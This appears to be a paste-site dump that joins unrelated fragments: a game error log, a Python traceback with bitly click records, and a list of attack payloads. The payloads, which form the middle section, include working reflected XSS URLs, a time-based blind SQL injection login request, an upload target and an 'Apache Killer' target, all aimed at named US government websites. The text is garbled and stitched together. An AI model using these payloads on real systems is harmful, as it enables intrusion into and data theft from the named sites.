790. Load XML from memory : system/cserror.xml(0x0009) - SUCCESS
791. Load XML from memory : system/messages.xml(0x0009) - SUCCESS
792. Load XML from memory : system/gametypecfg.xml
793. Dmp ok.
794. InitializeNotify ok.
795. WFog Enabled Device.
796. Vertex Shader isn't supported
797. can't create device
798. can't init display
799. error init RInitD3D
800.  
801. #Apache Killer
802.  
803. www.searc.usa.gov
804.  
805. Apache Version : 2.2.15
806.  
807. #XSS
808.  
809. http://answers.usa.gov/system/selfservice.controller?CONFIGURATION=1000&PARTITION_ID=1&CMD=VIEW_ARTICLE&ARTICLE_ID=1013%22%3E%3C/script%3E%3Cscript%3Ealert%28String.fromCharCode%2877,%20114,%2079,%20115,%2097,%20109,%2097%29%29;%3C/script%3E
810.  
811. #Source
812.  
813. ValueError Traceback (most recent call last)
814. /Users/hhimanshu/code/p/python/notebooks/<ipython-input-33-eb9c026d2b46> in <module>()
815. 8 file = urllib2.urlopen(bitly_data_path)
816. 9 records = [json.dumps(json.loads(line)) for line in file]
817. ---> 10 type(dict(records[0]))
818.  
819. ValueError: dictionary update sequence element #0 has length 1; 2 is required
820.  
821. { "a": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)", "c": "US", "nk": 1, "tz": "America/Chicago", "gr": "MO", "g": "f8zxQx", "h": "OYt09h", "l": "fhah03269", "hh": "bit.ly", "r": "direct", "u": "http://portal.hud.gov/hudportal/HUD?src=/i_want_to/talk_to_a_housing_counselor", "t": 1351662469, "hc": 1350056673, "kw": "HUDcounsel", "cy": "Saint Louis", "ll": [ 38.639900, -90.183998 ] }
822. { "a": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1", "c": "US", "nk": 1, "tz": "America/Los_Angeles", "gr": "WA", "g": "YlMtB7", "h": "YlMtB6", "l": "twitterfeed", "al": "en-us,en;q=0.5", "hh": "1.usa.gov", "r": "http://www.facebook.com/l.php?u=http%3A%2F%2F1.usa.gov%2FYlMtB6&h=1AQFYTwLaAQFVlA4rmQgAET0ZHeNpBYEtVPYb18UJmHGjPQ&s=1", "u": "http://alerts.weather.gov/cap/wwacapget.php?x=OR124CCAE88F2C.WindAdvisory.124CCAE9CD24OR.MFRNPWMFR.b3351cd23df7ee2759f052f670a174df&utm_medium=facebook&utm_source=twitterfeed", "t": 1351662473, "hc": 1351661843, "cy": "Poulsbo", "ll": [ 47.753700, -122.612297 ] }
823. { "a": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)", "c": "US", "nk": 0, "tz": "America/Indianapolis", "gr": "IN", "g": "rsE6tG", "h": "oeow2l", "l": "addthis", "hh": "bit.ly", "r": "direct", "u": "http://www.gsa.gov/portal/content/104109#.TjjjzkOlPCo.twitter", "t": 1351662478, "hc": 1312336782, "cy": "Indianapolis", "ll": [ 39.806198, -86.140701 ] }
824. { "a": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", "c": "RU", "nk": 1, "tz": "Europe/Moscow", "gr": "48", "g": "Q33nV2", "h": "TQWLo1", "l": "jerrybrown2010", "al": "ru", "hh": "bit.ly", "r": "http://yandex.ru/yandsearch?text=bit.ly&lr=213", "u": "http://gov.ca.gov/news.php?id=17800", "t": 1351662480, "hc": 1351565210, "cy": "Moscow", "ll": [ 55.752201, 37.615601 ] }
825. {"_heartbeat_":1351662481}
826. ...
827.  
828. records = [json.loads(line) for line in file]
829.  
830. json_data = urllib2.urlopen(bitly_data_path)
831. data = json.loads(json_data.read())
832.  
833. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
834. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
835. #Blind Sql Injecton
836.  
837. Referer: www.digitaledition.state.gov/manager/logincheck.php
838.  
839. Request: login=fkrqlaqj%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20&password=g00dPa$$w0rD&r=1&Submit=Login
840.  
841. #XSS
842.  
843. Referer: www.digitaledition.state.gov/magazine/register.php
844.  
845. Request: days=17%22%20onmouseover%3dprompt%28959590%29%20bad%3d%22&emailislogin=0&emailispass=0&i=1&id=1&issue=1&l=1&logo=1&m=1&magazineid=1&mode=1&p=1&pub_id=1&reader=1&s=1&submit=Submit
846.  
847. #Upload
848.  
849. Referer: www.digitaledition.state.gov/reports/confirm_register.php
850.  
851. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
852. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
853. _
854. / /\
855. / / /
856. / / / _
857. /_/ / / /\
858. \ \ \ / / \
859. \ \ \/ / /\ \
860. _ \ \ \/ /\ \ \
861. /_/\ \_\ / \ \ \
862. \ \ \ / / \ \_\/
863. \ \ \/ / /\ \
864. \ \ \/ /\ \ \
865. \ \ / \ \ \
866. \_\/ / / /
867. / / /
868. /_/ /
869. \_\/
870.  
871. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
872. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=